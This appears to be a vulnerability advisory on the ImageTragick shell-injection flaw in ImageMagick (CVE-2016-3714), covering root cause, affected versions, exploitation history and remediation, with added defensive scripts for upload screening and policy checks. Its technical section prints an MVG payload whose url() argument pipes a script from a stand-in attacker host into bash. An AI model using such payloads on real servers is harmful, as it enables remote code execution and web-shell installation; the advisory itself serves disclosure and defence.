CVE-2016-3714 — ImageMagick Improper Input Validation Vulnerability

CVE-2016-3714

ImageMagick "ImageTragick" — Shell Metacharacters in Image URLs Passed to Coders (EPHEMERAL, HTTPS, MVG, MSL) Enable Unauthenticated RCE on Web Servers Processing User-Uploaded Images

What Is ImageMagick?

ImageMagick is a ubiquitous open-source image processing suite used by virtually every web application that accepts user-uploaded images. Ruby on Rails, PHP applications, WordPress, Drupal, and thousands of custom web platforms call ImageMagick (directly or via language bindings like RMagick, MiniMagick, Imagick, and Wand) to resize, convert, watermark, and process uploaded images. Because ImageMagick processes arbitrary user-supplied image files on the server side, any remote code execution vulnerability in ImageMagick is simultaneously a vulnerability in every web application using it — making it a platform-level vulnerability affecting a massive fraction of the internet.

ImageMagick supports hundreds of image formats through "coders" — format-specific processing modules. Several of these coders interpret special URL schemes or embedded commands, creating shell injection opportunities when user input is not sanitized before being passed to ImageMagick.

Overview

Actively Exploited. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on September 9, 2024. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2016-3714, known as "ImageTragick", is a shell injection vulnerability in ImageMagick's image processing pipeline that allows remote code execution on any server processing user-supplied images with ImageMagick. When ImageMagick processes an image file whose URL or embedded content contains shell metacharacters, those characters are passed unsanitized to shell commands executed by certain ImageMagick coders (EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, PLT). Since ImageMagick is called by web applications to process uploaded images, an attacker can upload a crafted image file that causes the server to execute arbitrary OS commands. It was publicly disclosed on May 4, 2016, and mass exploitation followed immediately. CISA added CVE-2016-3714 to the KEV catalog in September 2024.

Affected Versions

ImageMagick                                                    Status
-------------------------------------------------------------  -------------------
ImageMagick < 6.9.3-10                                         Vulnerable
ImageMagick 7.x < 7.0.1-1                                      Vulnerable
ImageMagick 6.9.3-10 / 7.0.1-1 (policy.xml mitigation only)    Partially mitigated
ImageMagick 6.9.4+ / 7.0.2+                                    Fully patched

Note: Applications using ImageMagick through language bindings (Ruby RMagick/MiniMagick, PHP Imagick, Python Wand, Node.js imagemagick) are vulnerable through those bindings.

Technical Details

Root Cause: Shell Injection via Unvalidated Coder URLs

CVE-2016-3714 is an input validation failure (CWE-20) in ImageMagick's handling of image format identifiers and embedded URLs. Several ImageMagick coders process URLs or filenames by constructing shell commands that include user-supplied input without sanitization:

HTTPS coder example — when ImageMagick is asked to fetch and process an image from a URL, the URL is passed to wget or curl via a shell command. A crafted image file containing:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|curl http://attacker.com/shell.sh|bash")'
    pop graphic-context

causes ImageMagick to execute: wget "https://example.com/image.jpg"|curl http://attacker.com/shell.sh|bash" — injecting arbitrary commands.

MVG/MSL coders — ImageMagick's vector graphics (MVG) and Magick Scripting Language (MSL) coders process embedded commands that can reference external resources or execute operations, providing additional injection vectors.

Attack via uploaded image — because web applications pass user-uploaded files directly to ImageMagick, an attacker simply uploads a crafted file with a .png, .jpg, or .gif name (and, where needed, the matching magic bytes) so that naive upload checks accept it, with the MVG/URL injection payload in its body. ImageMagick processes the file, executes the injected commands as the web server process user, and returns results (or simply executes a reverse shell or downloads a backdoor).
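As an added example (not code from this advisory or from ImageMagick), the screening a defender would put in front of the upload path described above, which also implements remediation step 3 below: the file's leading bytes must match the raster format the form expects, and the head of the file must contain neither MVG/MSL directives nor shell metacharacters inside a url() argument. The sample inputs are constructed; the expected-format argument and the 8 KiB scan window are assumptions of this example.

```python
"""Screening of uploaded image bytes before they reach ImageMagick.

Added example; not code from the advisory or from ImageMagick. Assumptions:
the upload form knows which raster format (png / jpg / gif) it expects, and
only the first scan_bytes of the file need to be inspected for directives.
"""
import re
from typing import Optional, Tuple

# Magic bytes of the raster formats a typical upload form accepts.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Directives that occur in MVG (vector) or MSL (scripting) input and have no
# role in raster data. ImageMagick chooses a coder by sniffing content, so a
# file named .png whose body is MVG text is still handed to the MVG coder.
MVG_MARKERS = (b"push graphic-context", b"viewbox ", b"fill 'url(", b'fill "url(')
MSL_MARKERS = (b"<image ", b"<image>", b"<read ", b"<write ")

# A url(...) argument carrying quotes, pipes or other shell metacharacters is
# the core of CVE-2016-3714: the URL is spliced into a delegate shell command.
SHELL_META_IN_URL = re.compile(rb"""url\([^)]*["'|;`$&<>]""")


def detected_format(data: bytes) -> Optional[str]:
    """Return the raster format whose signature the file starts with, else None."""
    for fmt, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return fmt
    return None


def screen_upload(data: bytes, expected: str, scan_bytes: int = 8192) -> Tuple[bool, str]:
    """Decide whether `data` may be passed to ImageMagick as an `expected` image.

    Two independent checks: the leading bytes must match the declared raster
    format (content, not extension), and the head of the file must contain
    neither MVG/MSL directives nor shell metacharacters inside a url(...)
    argument. Returns (accepted, reason).
    """
    fmt = detected_format(data)
    if fmt != expected:
        return False, f"magic bytes indicate {fmt}, expected {expected}"
    head = data[:scan_bytes]
    for marker in MVG_MARKERS:
        if marker in head:
            return False, f"MVG directive {marker!r} inside a {expected} upload"
    for marker in MSL_MARKERS:
        if marker in head:
            return False, f"MSL element {marker!r} inside a {expected} upload"
    if SHELL_META_IN_URL.search(head):
        return False, "shell metacharacters inside a url() argument"
    return True, "ok"


# Constructed samples, not real uploads.
BENIGN_PNG = b"\x89PNG\r\n\x1a\n" + bytes(64)
# The MVG shape shown above, with the injected command replaced by a harmless echo.
MVG_TEXT = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/image.jpg\"|echo injected\")'\n"
    b"pop graphic-context\n"
)
# The same MVG text placed behind a valid PNG signature.
PNG_THEN_MVG = b"\x89PNG\r\n\x1a\n" + MVG_TEXT

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PNG), ("mvg-as-png", MVG_TEXT), ("png+mvg", PNG_THEN_MVG)):
        print(f"{name:12} {screen_upload(blob, 'png')}")
```

A file that carries a valid PNG/JPEG/GIF signature is routed to that raster coder by ImageMagick's own content sniffing, so the directive scan is a second line of defence for polyglots and for inputs that skip the signature check elsewhere in the application; on the rare legitimate image whose metadata trips a marker, the result is a logged rejection, the safer failure mode for an internet-facing upload form. This screening complements, and does not replace, the policy.xml coder denials and the version upgrade, which close the path inside ImageMagick itself.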

The "ImageTragick" Disclosure

The vulnerability was named "ImageTragick" by the disclosure team (Nikolay Ermishkin of Mail.Ru Security Team and Stewie) and published at imagetragick.com with working proof-of-concept exploit code on May 4, 2016. The disclosure caused immediate mass exploitation — within hours of the public announcement, exploitation attempts were observed globally. Cloudflare deployed WAF rules within 24 hours; major CDN providers and WAF vendors followed.

Companion CVEs

CVE-2016-3714 was disclosed alongside four related ImageMagick vulnerabilities affecting the same coders:

CVE              Type                                            Impact
---------------  ----------------------------------------------  ----------------------
CVE-2016-3714    Shell injection (EPHEMERAL, HTTPS, MVG, MSL)    RCE
CVE-2016-3715    Arbitrary file deletion (EPHEMERAL)             File deletion
CVE-2016-3716    File move (MSL)                                 File manipulation
CVE-2016-3717    Local file read (LABEL)                         Information disclosure
CVE-2016-3718    SSRF (HTTP/FTP coders)                          SSRF

Attack Characteristics

Attribute            Detail
-------------------  -------------------------------------------------------
Attack Vector        Any web app using ImageMagick to process uploads
Authentication       None required (public image upload forms)
Affected Coders      EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, PLT
Execution Context    Web server process user (www-data, apache, nginx)
Payload Delivery     Crafted image file with embedded shell commands

Discovery

Discovered by Nikolay Ermishkin (Mail.Ru Security Team) and researcher "Stewie." Coordinated disclosure was initiated with the ImageMagick developers but the disclosure window was short — the developers released a policy.xml-based mitigation on May 3, 2016, and public disclosure followed May 4, 2016. The short window resulted in widespread unpatched exposure at disclosure time.

Exploitation Context

  • Universal web application impact: The combination of ImageMagick's near-universal deployment in web applications and the simplicity of exploitation (upload a crafted image) made ImageTragick one of the most broadly impactful web vulnerabilities of 2016; virtually any web application with an image upload feature was potentially vulnerable
  • Immediate mass exploitation: Unlike many vulnerabilities with a gap between disclosure and weaponization, CVE-2016-3714 was exploited at scale within hours of disclosure; exploitation attempts were measured in the millions within days
  • Web shell deployment: The most common observed payloads were web shell downloads (PHP/Python reverse shells), enabling persistent access to compromised servers
  • Long tail of unpatched applications: Many web applications that include ImageMagick as a dependency were slow to apply updates — particularly WordPress/PHP deployments on shared hosting; CISA's September 2024 KEV addition reflects continued exploitation eight years after the original disclosure
  • WAF rule availability: WAF rules blocking ImageTragick payloads are available from all major WAF vendors (Cloudflare, AWS WAF, ModSecurity); these provide immediate mitigation for applications that cannot be immediately updated

Remediation

CISA BOD 22-01 Deadline: September 30, 2024. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
  1. Update ImageMagick to 6.9.4+ or 7.0.2+ — these versions include the complete fix for CVE-2016-3714. Apply via package manager (apt upgrade imagemagick, yum update imagemagick) or compile from source. Verify the installed version with convert --version.

  2. Apply policy.xml restrictions immediately — if an upgrade is not immediately possible, disable the dangerous coders in ImageMagick's policy.xml. Add the following entries inside the existing <policymap> element; the last four cover the TEXT, SHOW, WIN and PLT coders that are also listed as affected above:

    <policy domain="coder" rights="none" pattern="EPHEMERAL" />
    <policy domain="coder" rights="none" pattern="HTTPS" />
    <policy domain="coder" rights="none" pattern="MVG" />
    <policy domain="coder" rights="none" pattern="MSL" />
    <policy domain="coder" rights="none" pattern="URL" />
    <policy domain="coder" rights="none" pattern="HTTP" />
    <policy domain="coder" rights="none" pattern="TEXT" />
    <policy domain="coder" rights="none" pattern="SHOW" />
    <policy domain="coder" rights="none" pattern="WIN" />
    <policy domain="coder" rights="none" pattern="PLT" />

  3. Validate file content, not extension — applications should verify that uploaded files match the expected format using magic byte checks (not filename extension alone) before passing them to ImageMagick.

  4. Deploy WAF rules — enable ImageTragick-specific WAF rules (available in Cloudflare WAF, AWS WAF Managed Rules, ModSecurity CRS) to block exploitation attempts at the network edge.

  5. Run ImageMagick in isolation — process images in a sandboxed environment (Docker container, seccomp profile, or AppArmor/SELinux confinement) that restricts the shell access available if exploitation occurs.
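The following added example (not from this advisory or the ImageMagick project) verifies steps 1 and 2 above: it parses the banner that convert --version prints and compares it with the fully patched floors 6.9.4 / 7.0.2, and it reads a policy.xml and reports which of the coders named on this page are still not denied. It assumes the banner layout "Version: ImageMagick 6.9.3-10 ..." and a policy.xml whose <policy> elements sit under <policymap>; the sample banners and the partial policy fragment are constructed.

```python
"""Verification helpers for the ImageMagick upgrade and policy.xml steps.

Added example; not from the advisory or the ImageMagick project. Assumes the
banner format of `convert --version` ("Version: ImageMagick 6.9.3-10 ...")
and a policy.xml with the <policymap>/<policy> layout the advisory shows.
"""
import fnmatch
import re
import subprocess
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Releases the advisory calls fully patched, per major version.
FIXED_FLOOR = {6: (6, 9, 4), 7: (7, 0, 2)}

# Coders the advisory names as affected (Attack Characteristics) plus the
# URL and HTTP coders its policy fragment denies.
CODERS_TO_DENY = ("EPHEMERAL", "HTTPS", "HTTP", "URL", "MVG", "MSL",
                  "TEXT", "SHOW", "WIN", "PLT")

VERSION_RE = re.compile(r"ImageMagick\s+(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_version(banner: str) -> Optional[Tuple[int, int, int, int]]:
    """Return (major, minor, micro, patch) from a `convert --version` banner."""
    m = VERSION_RE.search(banner)
    if m is None:
        return None
    major, minor, micro, patch = m.groups()
    return int(major), int(minor), int(micro), int(patch or 0)


def is_fixed_version(banner: str) -> bool:
    """True when the banner names 6.9.4+ or 7.0.2+ (or any later major)."""
    v = parse_version(banner)
    if v is None:
        return False
    if v[0] > max(FIXED_FLOOR):
        return True
    floor = FIXED_FLOOR.get(v[0])
    return floor is not None and v[:3] >= floor


def missing_coder_denials(policy_xml: str) -> List[str]:
    """Coders in CODERS_TO_DENY that no <policy domain="coder" rights="none"> covers.

    ImageMagick matches `pattern` as a glob, so pattern="*" denies every coder.
    """
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain") != "coder" or pol.get("rights") != "none":
            continue
        pattern = pol.get("pattern", "")
        denied.update(c for c in CODERS_TO_DENY if fnmatch.fnmatchcase(c, pattern))
    return [c for c in CODERS_TO_DENY if c not in denied]


def installed_banner() -> str:
    """Output of `convert --version` on this host, or "" if ImageMagick is absent."""
    try:
        proc = subprocess.run(["convert", "--version"], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return ""
    return proc.stdout


# Constructed samples: banners in the `convert --version` layout, and a policy
# fragment that denies only the four coders the CVE title names.
OLD_BANNER = "Version: ImageMagick 6.9.3-7 Q16 x86_64 2016-04-20 http://www.imagemagick.org\n"
NEW_BANNER = "Version: ImageMagick 7.0.2-4 Q16 x86_64 2016-07-01 http://www.imagemagick.org\n"
PARTIAL_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>"""

if __name__ == "__main__":
    banner = installed_banner() or OLD_BANNER
    first = banner.strip().splitlines()[0] if banner.strip() else "(none)"
    print("installed:", first)
    print("fixed version:", is_fixed_version(banner))
    print("coders still allowed by sample policy:", missing_coder_denials(PARTIAL_POLICY))
```

Run against the real policy.xml by passing its contents to missing_coder_denials; an empty list means every coder this page names is denied. The version check deliberately treats 6.9.3-10 and 7.0.1-1 as not fixed, matching the Affected Versions table, since those releases only shipped the policy.xml mitigation.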

Key Details

Property              Value
--------------------  ---------------------------------------------------
CVE ID                CVE-2016-3714
Vendor / Product      ImageMagick — ImageMagick
NVD Published         2016-05-05
NVD Last Modified     2025-10-22
CVSS 3.1 Score        8.4
CVSS 3.1 Vector       CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity              HIGH
CWE                   CWE-20 — Improper Input Validation
CISA KEV Added        2024-09-09
CISA KEV Deadline     2024-09-30
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector         Local
Attack Complexity     Low
Privileges Required   None
User Interaction      None
Scope                 Unchanged
Confidentiality       High
Integrity             High
Availability          High

Required Action

CISA BOD 22-01 Deadline: 2024-09-30. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date         Event
-----------  ---------------------------------------------------------------------------
2016-05-03   Nikolay Ermishkin (Mail.Ru Security Team) and Stewie discover CVE-2016-3714; coordinated disclosure initiated with ImageMagick developers
2016-05-03   ImageMagick 6.9.3-10 and 7.0.1-1 released with policy.xml mitigations (patch incomplete — full fix not yet available)
2016-05-04   ImageTragick disclosure published at imagetragick.com; mass exploitation begins immediately
2016-05-05   CVE-2016-3714 and related CVEs (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, CVE-2016-3718) published by NVD
2016-05-06   Cloudflare WAF deployed rules blocking ImageTragick exploitation attempts
2024-09-09   Added to CISA Known Exploited Vulnerabilities catalog
2024-09-30   CISA BOD 22-01 remediation deadline